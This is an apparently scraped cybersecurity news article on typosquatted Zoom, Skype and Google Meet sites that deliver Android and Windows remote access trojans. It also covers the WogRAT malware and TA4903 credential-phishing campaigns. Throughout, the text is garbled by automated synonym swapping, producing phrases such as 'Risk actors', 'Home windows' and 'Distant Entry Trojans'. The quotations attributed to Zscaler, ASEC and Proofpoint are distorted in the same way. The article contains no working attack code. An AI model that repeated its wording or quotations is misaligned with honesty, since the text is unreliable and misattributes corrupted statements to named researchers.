Watch Out for Spoofed Zoom, Skype, Google Meet Websites Delivering Malware

Spoofed Zoom, Skype, Google Meet Sites

Risk actors have been leveraging pretend web sites promoting fashionable video conferencing software program resembling Google Meet, Skype, and Zoom to ship a wide range of malware focusing on each Android and Home windows customers since December 2023.

“The risk actor is distributing Distant Entry Trojans (RATs) together with SpyNote RAT for Android platforms, and NjRAT and DCRat for Home windows programs,” Zscaler ThreatLabz researchers said.

The spoofed websites are in Russian and are hosted on domains that intently resemble their professional counterparts, indicating that the attackers are utilizing typosquatting methods to lure potential victims into downloading the malware.


Additionally they include choices to obtain the app for Android, iOS, and Home windows platforms. Whereas clicking on the button for Android downloads an APK file, clicking on the Home windows app button triggers the obtain of a batch script.

The malicious batch script is liable for executing a PowerShell script, which, in flip, downloads and executes the distant entry trojan.

At present, there isn’t a proof that the risk actor is focusing on iOS customers, provided that clicking on the button for the iOS app takes the person to the professional Apple App Retailer itemizing for Skype.

“A risk actor is utilizing these lures to distribute RATs for Android and Home windows, which might steal confidential info, log keystrokes, and steal information,” the researchers mentioned.

The event comes because the AhnLab Safety Intelligence Middle (ASEC) revealed {that a} new malware dubbed WogRAT focusing on each Home windows and Linux is abusing a free on-line notepad platform known as aNotepad as a covert vector for internet hosting and retrieving malicious code.

Spoofed Zoom, Skype, Google Meet Sites

It is mentioned to be lively from at the least late 2022, focusing on Asian international locations like China, Hong Kong, Japan, and Singapore, amongst others. That mentioned, it is presently not recognized how the malware is distributed within the wild.

“When WogRAT is run for the primary time, it collects fundamental info of the contaminated system and sends them to the C&C server,” ASEC said. “The malware then helps instructions resembling executing instructions, sending outcomes, downloading information, and importing these information.”

It additionally coincides with high-volume phishing campaigns orchestrated by a financially motivated cybercriminal actor often known as TA4903 to steal company credentials and certain comply with them with enterprise e mail compromise (BEC) assaults. The adversary has been lively since at the least 2019, with the actions intensifying publish mid-2023.

“TA4903 routinely conducts campaigns spoofing varied U.S. authorities entities to steal company credentials,” Proofpoint said. “The actor additionally spoofs organizations in varied sectors together with building, finance, healthcare, meals and beverage, and others.”


Assault chains contain the usage of QR codes (aka quishing) for credential phishing in addition to counting on the EvilProxy adversary-in-the-middle (AiTM) phishing equipment to bypass two-factor authentication (2FA) protections.

As soon as a goal mailbox is compromised, the risk actor has been noticed trying to find info related to funds, invoices, and financial institution info, with the last word purpose of hijacking present e mail threads and performing bill fraud.

Phishing campaigns have additionally functioned as a conduit for different malware households like DarkGate, Agent Tesla, and Remcos RAT, the final of which leverages steganographic decoys to drop the malware on compromised hosts.

Notify of
Inline Feedbacks
View all comments
Previous Post
NIST CSF 2.0's Govern Function

NIST CSF 2.0’s Govern Perform

Next Post
Facebook Messages

New Python-Primarily based Snake Information Stealer Spreading Via Fb Messages

Related Posts